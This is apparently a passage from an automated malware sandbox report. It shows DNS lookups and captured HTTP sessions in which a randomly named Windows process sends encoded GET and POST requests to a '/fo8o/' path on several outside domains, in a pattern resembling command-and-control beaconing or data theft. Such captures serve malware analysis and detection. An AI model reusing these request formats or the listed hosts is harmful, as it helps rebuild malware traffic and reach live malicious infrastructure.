Jan 11, 2025 04:08:30.113714933 CET	60026	53	192.168.2.8	1.1.1.1
Jan 11, 2025 04:08:30.188539028 CET	53	60026	1.1.1.1	192.168.2.8
Jan 11, 2025 04:08:43.498615026 CET	57614	53	192.168.2.8	1.1.1.1
Jan 11, 2025 04:08:43.507945061 CET	53	57614	1.1.1.1	192.168.2.8
Jan 11, 2025 04:08:51.566723108 CET	55662	53	192.168.2.8	1.1.1.1
Jan 11, 2025 04:08:51.575391054 CET	53	55662	1.1.1.1	192.168.2.8
Jan 11, 2025 04:08:59.630527973 CET	60012	53	192.168.2.8	1.1.1.1
Jan 11, 2025 04:08:59.678961039 CET	53	60012	1.1.1.1	192.168.2.8
Jan 11, 2025 04:09:12.990166903 CET	53814	53	192.168.2.8	1.1.1.1
Jan 11, 2025 04:09:13.000453949 CET	53	53814	1.1.1.1	192.168.2.8
Jan 11, 2025 04:09:21.066642046 CET	55018	53	192.168.2.8	1.1.1.1
Jan 11, 2025 04:09:21.076993942 CET	53	55018	1.1.1.1	192.168.2.8
Jan 11, 2025 04:09:29.131390095 CET	60494	53	192.168.2.8	1.1.1.1
Jan 11, 2025 04:09:29.162175894 CET	53	60494	1.1.1.1	192.168.2.8
Jan 11, 2025 04:09:33.393537998 CET	56539	53	192.168.2.8	1.1.1.1
Jan 11, 2025 04:09:33.424154043 CET	53	56539	1.1.1.1	192.168.2.8
Jan 11, 2025 04:09:38.441809893 CET	55920	53	192.168.2.8	1.1.1.1
Jan 11, 2025 04:09:38.450539112 CET	53	55920	1.1.1.1	192.168.2.8
Jan 11, 2025 04:09:55.455738068 CET	62740	53	192.168.2.8	1.1.1.1
Jan 11, 2025 04:09:55.464342117 CET	53	62740	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 11, 2025 04:05:55.295248985 CET	192.168.2.8	1.1.1.1	0x3f82	Standard query (0)	www.3xfootball.com	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:06:11.662455082 CET	192.168.2.8	1.1.1.1	0x7732	Standard query (0)	www.kasegitai.tokyo	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:06:19.753802061 CET	192.168.2.8	1.1.1.1	0x9a4f	Standard query (0)	www.goldenjade-travel.com	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:06:33.691728115 CET	192.168.2.8	1.1.1.1	0xa7f5	Standard query (0)	www.antonio-vivaldi.mobi	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:06:41.753926039 CET	192.168.2.8	1.1.1.1	0x916c	Standard query (0)	www.magmadokum.com	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:07:55.333975077 CET	192.168.2.8	1.1.1.1	0x4321	Standard query (0)	www.rssnewscast.com	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:08:08.801131010 CET	192.168.2.8	1.1.1.1	0xf5c2	Standard query (0)	www.liangyuen528.com	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:08:16.863879919 CET	192.168.2.8	1.1.1.1	0x9020	Standard query (0)	www.techchains.info	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:08:30.113714933 CET	192.168.2.8	1.1.1.1	0x54b9	Standard query (0)	www.elettrosistemista.zip	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:08:43.498615026 CET	192.168.2.8	1.1.1.1	0x7c22	Standard query (0)	www.donnavariedades.com	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:08:51.566723108 CET	192.168.2.8	1.1.1.1	0x9052	Standard query (0)	www.660danm.top	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:08:59.630527973 CET	192.168.2.8	1.1.1.1	0xfd0	Standard query (0)	www.empowermedeco.com	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:09:12.990166903 CET	192.168.2.8	1.1.1.1	0xff2	Standard query (0)	www.joyesi.xyz	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:09:21.066642046 CET	192.168.2.8	1.1.1.1	0xcb74	Standard query (0)	www.k9vyp11no3.cfd	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:09:29.131390095 CET	192.168.2.8	1.1.1.1	0x754d	Standard query (0)	www.shenzhoucui.com	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:09:33.393537998 CET	192.168.2.8	1.1.1.1	0xc70f	Standard query (0)	www.shenzhoucui.com	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:09:38.441809893 CET	192.168.2.8	1.1.1.1	0x47d	Standard query (0)	www.b301.space	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:09:55.455738068 CET	192.168.2.8	1.1.1.1	0xe5a6	Standard query (0)	www.kasegitai.tokyo	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 04:05:55.700510025 CET	1.1.1.1	192.168.2.8	0x3f82	No error (0)	www.3xfootball.com		154.215.72.110	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:06:11.671108007 CET	1.1.1.1	192.168.2.8	0x7732	Name error (3)	www.kasegitai.tokyo	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:06:20.135008097 CET	1.1.1.1	192.168.2.8	0x9a4f	No error (0)	www.goldenjade-travel.com		116.50.37.244	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:06:33.700583935 CET	1.1.1.1	192.168.2.8	0xa7f5	Name error (3)	www.antonio-vivaldi.mobi	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:06:41.872621059 CET	1.1.1.1	192.168.2.8	0x916c	No error (0)	www.magmadokum.com	redirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 04:06:41.872621059 CET	1.1.1.1	192.168.2.8	0x916c	No error (0)	redirect.natrocdn.com	natroredirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 04:06:41.872621059 CET	1.1.1.1	192.168.2.8	0x916c	No error (0)	natroredirect.natrocdn.com		85.159.66.93	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:07:55.346440077 CET	1.1.1.1	192.168.2.8	0x4321	No error (0)	www.rssnewscast.com		91.195.240.94	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:08:08.811189890 CET	1.1.1.1	192.168.2.8	0xf5c2	Name error (3)	www.liangyuen528.com	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:08:16.891273975 CET	1.1.1.1	192.168.2.8	0x9020	No error (0)	www.techchains.info		66.29.149.46	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:08:30.188539028 CET	1.1.1.1	192.168.2.8	0x54b9	No error (0)	www.elettrosistemista.zip	elettrosistemista.zip		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 04:08:30.188539028 CET	1.1.1.1	192.168.2.8	0x54b9	No error (0)	elettrosistemista.zip		195.110.124.133	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:08:43.507945061 CET	1.1.1.1	192.168.2.8	0x7c22	Name error (3)	www.donnavariedades.com	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:08:51.575391054 CET	1.1.1.1	192.168.2.8	0x9052	Name error (3)	www.660danm.top	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:08:59.678961039 CET	1.1.1.1	192.168.2.8	0xfd0	No error (0)	www.empowermedeco.com	empowermedeco.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 04:08:59.678961039 CET	1.1.1.1	192.168.2.8	0xfd0	No error (0)	empowermedeco.com		217.196.55.202	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:09:13.000453949 CET	1.1.1.1	192.168.2.8	0xff2	Name error (3)	www.joyesi.xyz	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:09:21.076993942 CET	1.1.1.1	192.168.2.8	0xcb74	Name error (3)	www.k9vyp11no3.cfd	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:09:29.162175894 CET	1.1.1.1	192.168.2.8	0x754d	Name error (3)	www.shenzhoucui.com	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:09:33.424154043 CET	1.1.1.1	192.168.2.8	0xc70f	Name error (3)	www.shenzhoucui.com	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:09:38.450539112 CET	1.1.1.1	192.168.2.8	0x47d	Name error (3)	www.b301.space	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:09:55.464342117 CET	1.1.1.1	192.168.2.8	0xe5a6	Name error (3)	www.kasegitai.tokyo	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.3xfootball.com

www.goldenjade-travel.com

www.magmadokum.com

www.rssnewscast.com

www.techchains.info

www.elettrosistemista.zip

www.empowermedeco.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49709	154.215.72.110	80	2040	C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 04:05:55.714440107 CET	516	OUT	GET /fo8o/?7Fp=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1aOjYc66J7Y/iHKqqtd6zR7stgJ4hm8X7oMbvduFmUyU2g==&HN4=EPU0u4nHA HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.3xfootball.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jan 11, 2025 04:05:56.590811014 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 11 Jan 2025 03:05:56 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49710	116.50.37.244	80	2040	C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 04:06:20.179512024 CET	799	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.goldenjade-travel.com Origin: http://www.goldenjade-travel.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 204 Referer: http://www.goldenjade-travel.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 37 46 70 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 66 2b 69 68 4b 4e 35 6b 56 6a 42 53 54 58 45 45 48 35 7a 4f 77 6e 61 50 46 49 62 45 35 61 50 52 57 73 55 6b 58 34 3d Data Ascii: 7Fp=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfOf+ihKN5kVjBSTXEEH5zOwnaPFIbE5aPRWsUkX4=
Jan 11, 2025 04:06:21.042572975 CET	492	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Sat, 11 Jan 2025 03:06:20 GMT Connection: close Content-Length: 315 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49712	116.50.37.244	80	2040	C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 04:06:22.713421106 CET	819	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.goldenjade-travel.com Origin: http://www.goldenjade-travel.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 224 Referer: http://www.goldenjade-travel.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 37 46 70 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 49 67 4e 4e 5a 73 74 39 55 32 79 4d 43 39 72 62 30 34 44 61 2f 4e 2f 79 65 36 36 4d 5a 44 48 74 76 63 4b 73 66 4e 62 64 44 56 77 78 59 62 68 33 49 42 6c 34 6f 55 62 37 2b 37 47 5a 41 4d 57 31 6b 47 43 73 6e 30 4a 45 6d 4f 75 35 50 55 78 76 76 30 6b 59 5a 50 72 4e 6b 67 44 5a 4b 4f 5a 4a 43 6f 6b 32 56 4c 70 76 36 4c 44 54 62 32 52 2f 65 78 50 57 71 70 45 38 71 52 6b 5a 74 32 71 6b 44 69 54 6c 36 75 65 6c 78 31 4e 77 50 78 50 47 67 74 42 4f 48 6e 4c 31 38 6b 36 41 73 61 6f 55 78 39 79 59 4e 2b 77 4c 4a 73 72 55 72 4f 70 64 44 34 Data Ascii: 7Fp=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJIgNNZst9U2yMC9rb04Da/N/ye66MZDHtvcKsfNbdDVwxYbh3IBl4oUb7+7GZAMW1kGCsn0JEmOu5PUxvv0kYZPrNkgDZKOZJCok2VLpv6LDTb2R/exPWqpE8qRkZt2qkDiTl6uelx1NwPxPGgtBOHnL18k6AsaoUx9yYN+wLJsrUrOpdD4
Jan 11, 2025 04:06:23.587286949 CET	492	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Sat, 11 Jan 2025 03:06:22 GMT Connection: close Content-Length: 315 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49713	116.50.37.244	80	2040	C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 04:06:25.244136095 CET	1836	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.goldenjade-travel.com Origin: http://www.goldenjade-travel.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1240 Referer: http://www.goldenjade-travel.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 37 46 70 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 41 67 4e 34 4e 73 75 63 55 32 7a 4d 43 39 30 72 30 35 44 61 2b 4e 2f 7a 32 32 36 4d 56 54 48 75 58 63 4c 4a 44 4e 4d 2f 6e 56 70 68 59 62 73 58 49 41 71 59 70 4f 62 36 4f 2f 47 5a 51 4d 57 31 6b 47 43 75 2f 30 50 52 4b 4f 6f 35 50 58 32 76 76 6f 79 6f 59 53 72 4e 38 4b 44 59 2f 37 5a 2f 79 6f 71 31 74 4c 73 64 43 4c 4f 54 62 30 53 2f 65 70 50 57 6d 36 45 38 6d 64 6b 59 49 62 71 6e 54 69 65 78 6a 78 4c 33 4e 5a 57 68 6e 6e 48 47 38 30 47 66 75 47 57 32 34 46 38 33 63 42 75 79 31 41 38 72 51 79 39 4c 70 35 32 41 37 47 76 59 53 59 56 49 73 2f 49 33 72 38 67 37 5a 62 6a 2f 7a 74 4f 46 34 35 65 5a 53 46 67 66 61 42 6e 50 75 52 41 4f 73 6e 32 58 74 32 56 70 38 48 75 46 47 77 38 37 38 2b 67 4e 32 42 72 79 6c 64 77 4e 46 47 67 41 5a 53 49 78 6b 33 66 67 73 71 50 41 50 61 68 70 39 4c 55 68 44 41 77 48 65 4d 57 4a 74 6d 53 4b 36 4f 65 43 44 54 68 56 6a 42 45 37 7a 4a 4a 4a [TRUNCATED] Data Ascii: 7Fp=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJAgN4NsucU2zMC90r05Da+N/z226MVTHuXcLJDNM/nVphYbsXIAqYpOb6O/GZQMW1kGCu/0PRKOo5PX2vvoyoYSrN8KDY/7Z/yoq1tLsdCLOTb0S/epPWm6E8mdkYIbqnTiexjxL3NZWhnnHG80GfuGW24F83cBuy1A8rQy9Lp52A7GvYSYVIs/I3r8g7Zbj/ztOF45eZSFgfaBnPuRAOsn2Xt2Vp8HuFGw878+gN2BryldwNFGgAZSIxk3fgsqPAPahp9LUhDAwHeMWJtmSK6OeCDThVjBE7zJJJx0btYqpNJOfJCLFbfhZZiwlYB9p5dkODFcSUOpz0h/mwyF5OM906gm7ZV03J6dK1Vxfgojz6iB1wpMYBMRckzt2D/eIJtpT20mt4OA+JQXnrpexn1yMz8KdBrvpVD3U3zmeu86O+GkCmNwX7rMVU1cLUAi6eDP91cfrHTUWULSg8QPjipQC0PcC/GCq+YVMXHhXxD5wzig4vxekCYTpVYZipXjiiZIvQaAQFC7hmpC1AbIVYNRRZEb41tWov5AMqRlLiTbWPtjQ9uONwD1KCxGB0412qA4Kbc92OIfsourRmt+pOu57FojipUf+K+41IChjLJy3WG6SaABhRSvFLg5JBBa1I1R+vFj74Pg3XYGN6YoZcsM4v1XQu9a5qUtGMLt9n4kQLanQZosbnFyxGK9PGSROzwxWMGX1iyxA04Xbxtjtqvdvs0G55TeL20KSKniOZ83+UdQoGsYEt1RkWFgAqa3JqQHgOqqwn76jr+RIcVDQhFfXPJqCg+/c5lh2hRsRx8cooQh/BDEWAZ6Ab11kuAT+7TGrH6aNwMlnC6NeZMJCh8jGzl5kXirquVdNiOC6Jgcqo2YKO8gpBClsQEAK34f/fEJ3cr0H35RrLK/aRrUwZ+S+oixHJ1DkdJUrOZIdo0VE64eWxpB3wpbR/tETOU/yknxVEOx [TRUNCATED]
Jan 11, 2025 04:06:26.138714075 CET	492	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Sat, 11 Jan 2025 03:06:25 GMT Connection: close Content-Length: 315 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49714	116.50.37.244	80	2040	C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 04:06:27.802752972 CET	523	OUT	GET /fo8o/?7Fp=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2yArpDgvi6oTdq6vPucKXgoaIsT3InbTvvq+zcnCyLgXuQ==&HN4=EPU0u4nHA HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.goldenjade-travel.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
